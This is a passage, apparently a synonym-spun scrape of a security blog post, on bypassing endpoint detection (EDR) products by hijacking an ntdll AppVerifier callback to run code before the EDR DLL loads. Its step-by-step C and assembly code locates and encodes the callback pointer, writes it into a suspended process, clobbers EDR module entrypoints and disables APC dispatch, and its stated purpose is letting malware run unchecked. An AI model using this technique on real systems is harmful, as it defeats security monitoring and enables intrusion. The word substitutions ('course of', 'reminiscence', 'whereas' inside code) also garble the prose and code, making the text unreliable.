Bypassing EDRs With EDR-Preloading -

Beforehand, I wrote an article detailing how system calls could be utilized to bypass consumer mode EDR hooks.
Now, I need to introduce an alternate approach, “EDR-Preloading”, which includes working malicious code earlier than the EDR’s DLL is loaded into the method, enabling us to forestall it from working in any respect.
By neutralizing the EDR module, we will freely name capabilities usually with out having to fret about consumer mode hooks, due to this fact don’t must depend on direct or oblique syscalls.

This method makes use of some assumptions and flaws in the way in which EDRs load their consumer mode part.
The EDR must inject its DLL into each course of as a way to hook consumer mode perform, however run the DLL too early and the method will crash, run it too late and the method might have already executed malicious code.
The sweet-spot most EDRs have gone with is beginning their DLL as late in course of initialization as attainable, while nonetheless with the ability to do the whole lot they want earlier than the method entrypoint known as.

theoretically, all we’d like is to discover a strategy to load code slightly bit earlier in course of initialization, then we will preempt the EDR.

To grasp when EDR DLLs can and might’t load, we have to perceive a bit about course of initialization.

Each time a brand new course of is created, the kernel maps the goal executable’s picture into reminiscence together with ntdll.dll.
A single thread is then created, which is able to finally function the entrypoint thread.
Presently, the method is simply an empty shell (the PEB, TEB, and imports are all uninitialized). Earlier than the method entrypoint could be referred to as, a good bit of setup should be carried out.

Each time a brand new thread begins, its begin tackle will likely be set to ntdll!LdrInitializeThunk(), which is chargeable for calling ntdll!LdrpInitialize().

ntdll!LdrpInitialize() has two functions:

Initialize the method (if it’s not already initialized)
Initialize the thread

ntdll!LdrpInitialize() first checks the worldwide variable ntdll!LdrpProcessInitialized, which, if set to FALSE, will lead to a name to ntdll!LdrpInitializeProcess() prior to string initialization.

ntdll!LdrpInitializeProcess() does what it says on the tin. It’ll arrange the PEB, resolve the method imports, and cargo any required DLLs.

Proper on the finish of ntdll!LdrpInitialize() is a name to ntdll!ZwTestAlert(), which is the perform used to run all of the Asynchronous Process Calls (APCs) within the present thread’s APC queue.
EDR drivers that inject code into the goal course of and name it by way of ntoskrnl!NtQueueApcThread() will see their code executed right here.

As soon as the thread and course of initialization is full and ntdll!LdrpInitialize() returns, ntdll!LdrInitializeThunk() will name ntdll!ZwContinue() which transfers execution again to the kernel.
The kernel will then set the thread instruction pointer to level to ntdll!RtlUserThreadStart(), which is able to name the executable entrypoint and the method’s life formally start.

Course of initialization move chart

Early APC queuing

Since APCs execute in First-in First-out order, it’s generally attainable to preempt sure EDRs by queueing your individual APC first.
Many EDRs monitor for brand new processes by register a kernel callback utilizing ntoskrnl!PsSetLoadImageNotifyRoutine().
Each time a brand new course of begins, it robotically hundreds ntdll.dll and kernel32.dll, so this serves as a great way to detect when new processes are being initialized.
By beginning a course of in a suspended state, you’ll be able to queue an APC previous to initialization, due to this fact ending up on the entrance of the queue.
This method is typically known as “Early Fowl injection”.

The issue with queuing APCs is that they have lengthy been used for code injection, due to this fact ntdll!NtQueueApcThread() is hooked and monitored by most EDRs.
Queuing an APC right into a suspended course of is extremely suspicious and likewise nicely documented. It’s additionally attainable the EDR might hook your
APC, re-order the APC queue, or do any matter of different issues to make sure its DLL runs first.

TLS Callback

TLS callbacks are executed in direction of the tip of ntdll!LdrpInitializeProcess(), however previous to ntdll!ZwTestAlert(), so, run earlier than any APCs.
In circumstances the place an utility makes use of TLS callback, some EDRs could inject code to intercept the callback, or load the EDR DLL barely earlier to compensate.
A lot to my amazement, one EDRs I examined on was nonetheless bypassable utilizing a TLS callback.

My aim was easy, however truly not easy in any respect, and likewise very time-consuming.
I needed to discover a strategy to execute code earlier than the entrypoint, earlier than TLS callbacks, at first that would probably intrude with my code.
This meant reverse engineering your entire course of and DLL loader to search for something I might use. In the long run, I discovered precisely what I wanted.

Behold, the AppVerifier and ShimEnginer interfaces

Way back, Microsoft created a instrument referred to as AppVerifier, for, nicely, app verification.
It’s designed to observe purposes at runtime for bugs, compatibility points, and so forth.
A lot of AppVerifier’s performance is facilitated by the addition of a complete host of recent callbacks inside ntdll.

Whereas reverse engineering the AppVerifier layer, I truly discovered two units of helpful callback (AppVerifier and ShimEngine).

Shim Engine associated variables

App Verifier associated variables

Two pointers that caught my eye had been ntdll!g_pfnSE_GetProcAddressForCaller and ntdll!AvrfpAPILookupCallbackRoutine, a part of the ShimEngine and AppVerifier layers respectively.
Each pointers are referred to as towards the tip of ntdll!LdrGetProcedureAddressForCaller(), which is the perform used internally by GetProcAddress() to resolve the tackle of exported capabilities.

The code in LdrGetProcedureAddressForCaller() which implements the callbacks

These callbacks are good as a result of LdrGetProcedureAddress() is assured to be referred to as by LdrpInitializeProcess() when it hundreds kernelbase.dll.
It’s additionally referred to as any time something tries to resolve an export with GetProcAddress() / LdrGetProcedureAddress(), together with the EDR, which has quite a lot of enjoyable potential.
Even higher, these pointers exist in a reminiscence part that’s writable previous to course of initialization.

Deciding on a callback to hook

While there have been many good choices, I made a decision to go along with AvrfpAPILookupCallbackRoutine, which seems to have been launched in Home windows 8.1.
While I might use the older callbacks for compatibility with earlier Home windows model, it’d be much more work and I needed to maintain my PoC easy.

The remainder of the AppVerifer interface requires that you simply set up a “Verifier Supplier”, which requires a ton of reminiscence manipulation.
The ShimEngine is barely simpler, however setting g_ShimsEnabled to TRUE enabled all callbacks, not simply the one we would like, so we should register each callback or the applying will crash.

The newer AvrfpAPILookupCallbackRoutine is very nice for 2 causes:

It may be enabled independently of the AppVerifier interface by setting ntdll!AvrfpAPILookupCallbacksEnabled, so no AppVerifier supplier wanted.
Each ntdll!AvrfpAPILookupCallbacksEnabled and ntdlL!AvrfpAPILookupCallbackRoutine are simply locatable in reminiscence, particularly on Home windows 10.

For demonstration functions I made a decision to construct a proof-of-concept that makes use of the AvrfpAPILookupCallbackRoutine callback to load earlier than the EDR DLL, then stop it from loading.
Presently, I’ve solely examined it on two main EDRs, however it ought to theoretically work in opposition to any EDR code injection with a couple of tweaks.

You’ll find the total supply code on the backside of the article.

Step 1: finding the AppVerifier callback pointer

As a way to arrange a callback we have to set ntdll!AvrfpAPILookupCallbacksEnabled and ntdll!AvrfpAPILookupCallbackRoutine.
On Home windows 10, each variables are situated towards the start of ntdll’s .mrdata part, which is writable throughout course of initialization.

ntdll!AvrfpAPILookupCallbacksEnabled is discovered direct after ntdll!LdrpMrdataBase (although generally ntdll!LdrpKnownDllDirectoryHandle sits earlier than it).

Each variables appear to at all times be precisely 8 bytes aside and in the identical order.
In an initialized course of, the structure ought to look one thing like this:

offset+0x00 – ntdll!LdrpMrdataBase (set to base tackle of .mrdata part)
offset+0x08 – ntdll!LdrpKnownDllDirectoryHandle (set to a non-zero worth)
offset+0x10 – ntdll!AvrfpAPILookupCallbacksEnabled (set to zero)
offset+0x18 – ntdll!AvrfpAPILookupCallbackRoutine (set to zero)

We are able to scan the .mrdata part in our personal course of for a pointer containing the part base tackle, then the primary NULL worth after that will likely be AvrfpAPILookupCallbackRoutine.

ULONG_PTR find_avrfp_address(ULONG_PTR mrdata_base) {
    ULONG_PTR address_ptr = mrdata_base + 0x280;  //the pointer we would like is 0x280+ bytes in
    ULONG_PTR ldrp_mrdata_base = NULL;

    for (int i = 0; i < 10; i++) {
        if (*(ULONG_PTR*)address_ptr == mrdata_base) {
            ldrp_mrdata_base = address_ptr;
            break;
        }
        address_ptr += sizeof(LPVOID);  // skip to the subsequent pointer
    }
    
    address_ptr = ldrp_mrdata_base;
    
    // AvrfpAPILookupCallbackRoutine ought to be the primary NULL pointer after LdrpMrdataBase
    for (int i = 0; i < 10; i++) {
        if (*(ULONG_PTR*)address_ptr == NULL) {
            return address_ptr;
        }
        address_ptr += sizeof(LPVOID);  // skip to the subsequent pointer
    }
    return NULL;
}

Step 2: organising the callback to name our malicious code

The best strategy to arrange the callback is simply launch a second copy of our personal course of in a suspended state.
Since ntdll is on the identical tackle in each course of, we solely must find the callback pointer in our personal course of.
As soon as our course of is launched however in a suspended state, we will simply use WriteProcessMemory() to set the pointer.

We might additionally use this method for course of hollowing, shellcode injection, and extra, because it permits us to execute code with out creating/hijacking threads, or queuing an APC. However for this PoC we’ll maintain it easy.

notice: since many ntdll pointers are encrypted, we will’t simply set the pointer to our goal tackle. We have now to encrypt it first.
Fortunately, the secret is the identical worth and saved on the identical location throughout all processes.

LPVOID encode_system_ptr(LPVOID ptr) {
    // get pointer cookie from SharedUserData!Cookie (0x330)
    ULONG cookie = *(ULONG*)0x7FFE0330;

    // encrypt our pointer so it will work when written to ntdll
    return (LPVOID)_rotr64(cookie ^ (ULONGLONG)ptr, cookie & 0x3F);
}

Now we will simply write the pointer and set AvrfpAPILookupCallbacksEnabled to 1 utilizing WriteProcessMemory():

    // ntdll pointer are encoded utilizing the system pointer cookie situated at SharedUserData!Cookie
    LPVOID callback_ptr = encode_system_ptr(&My_LdrGetProcedureAddressCallback);

    // set ntdll!AvrfpAPILookupCallbacksEnabled to TRUE
    uint8_t bool_true = 1;

    // set ntdll!AvrfpAPILookupCallbackRoutine to our encoded callback tackle
    if (!WriteProcessMemory(pi.hProcess, (LPVOID)(avrfp_address+8), &callback_ptr, sizeof(ULONG_PTR), NULL)) {
        printf("Write 2 failed, error: %dn", GetLastError());
    }

    if (!WriteProcessMemory(pi.hProcess, (LPVOID)avrfp_address, &bool_true, 1, NULL)) {
        printf("Write 3 failed, error: %dn", GetLastError());
    }

Step 3: executing the callback & neutralizing the EDR

As soon as we name ResumeThread() on the suspended course of, our callback will likely be executed each time LdrpGetProcedureAddress() known as, the primary of which ought to be when LdrpInitializeProcess() hundreds kernelbase.dll.

LdrpInitializeProcess calling LdrLoadDll to load kernelbase.dll

A phrase of warning: kernelbase.dll shouldn’t be totally loaded when our callback is fired, and the set off occurs inside LdrLoadDll, thus the loader lock remains to be acquired.
Kernelbase not but being loaded means we’re restricted to calling solely ntdll capabilities, and the loader lock prevents us from launching any threads or processes, in addition to loading DLLs.

Since we’re extremely restricted in what we will do, the only plan of action is to only stop the EDR DLL from loading, then wait till the method is totally initialized earlier than beginning the malware celebration.

To make sure correct neutralization of the EDRs I examined on, I took a multi-pronged method.

DLL Clobbering

This early within the course of lifecycle solely ntdll.dll, kernel32.dll, and kernelbase.dll ought to be loaded.
Some EDRs could pre-emptively map their DLL into reminiscence, however wait till later to name the entrypoint.
While we might most likely unload these DLLs by calling ntdll!LdrUnloadDll() as soon as the loader lock is launched (or do it manually), a fast and soiled answer is to only clobber their entrypoints.

What we’ll do is iterate by way of the LDR module checklist and simply change the entrypoint tackle of any DLL that shouldn’t be there.

DWORD EdrParadise() {
    // we'll changed the EDR entrypoint with this equally helpful perform
    // todo: cease malware

    return ERROR_TOO_MANY_SECRETS;
}

void DisablePreloadedEdrModules() {
    PEB* peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    LIST_ENTRY* list_head = &peb->Ldr->InMemoryOrderModuleList;
    LIST_ENTRY* list_entry = list_head->Flink->Flink;

    whereas (list_entry != list_head) {
        PLDR_DATA_TABLE_ENTRY2 module_entry = CONTAINING_RECORD(list_entry, LDR_DATA_TABLE_ENTRY2, InMemoryOrderLinks);

        // solely the under DLLs ought to be loaded this early, the rest might be a safety product
        if (SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"ntdll.dll") != 0 &&
            SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"kernel32.dll") != 0 &&
            SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"kernelbase.dll") != 0) {

            module_entry->EntryPoint = &EdrParadise;
        }

        list_entry = list_entry->Flink;
    }
}

Disabling the APC dispatcher

When APCs are queued to a thread they get processed by ntdll!KiUserApcDispatcher(), which runs the APC then calls ntdll!NtContinue() to return the thread to its authentic context.
By hooking KiUserApcDispatcher and changing it with our personal perform that simply calls NtContinue() on a loop, no APCs can ever be queued into our course of (together with these from the EDR’s kernel driver).

; easy APC dispatcher that does the whole lot besides dispatch APCs
KiUserApcDispatcher PROC
  _loop:
    name GetNtContinue
    mov rcx, rsp
    mov rdx, 1
    name rax
    jmp _loop
  ret
KiUserApcDispatcher ENDP

Proxying LdrLoadDll calls

By inserting a hook on ntdll!LdrLoadDll(), we will monitor which DLLs are being loaded.
If any EDR tries to load its DLL utilizing LdrLoadDll, we will unload or disable it.
Ideally we most likely need to hook ntdll!LdrpLoadDll(), which is decrease stage and referred to as straight by some EDRs, however for simplicity’s sake, we’ll simply use LdrLoadDll.

// we will use this hook to forestall new modules from being loaded (although with each EDRs I examined, we needn't)
NTSTATUS WINAPI LdrLoadDllHook(PWSTR search_path, PULONG dll_characteristics, UNICODE_STRING* dll_name, PVOID* base_address) {
    
    //todo: DLL create a listing of DLLs to both be allowed or disallowed
    
    return OriginalLdrLoadDll(search_path, dll_characteristics, dll_name, base_address);
}

Whereas this PoC is barely designed for Home windows 10 64-bit, the approach ought to be viable on programs not less than as early as Home windows 7 (I haven’t checked XP or Vista).
Nevertheless, discovering the proper offsets is harder under Home windows 10. For a extra sturdy methodology, I like to recommend utilizing a disassembler.
Both means, this was a reasonably enjoyable weekend venture and hopefully somebody is ready to be taught one thing from it.

For those who take pleasure in my work please observe me on LinkedIn and Mastodon for extra.

You’ll find the total supply code right here: github.com/MalwareTech/EDR-Preloader

Bypassing EDRs With EDR-Preloading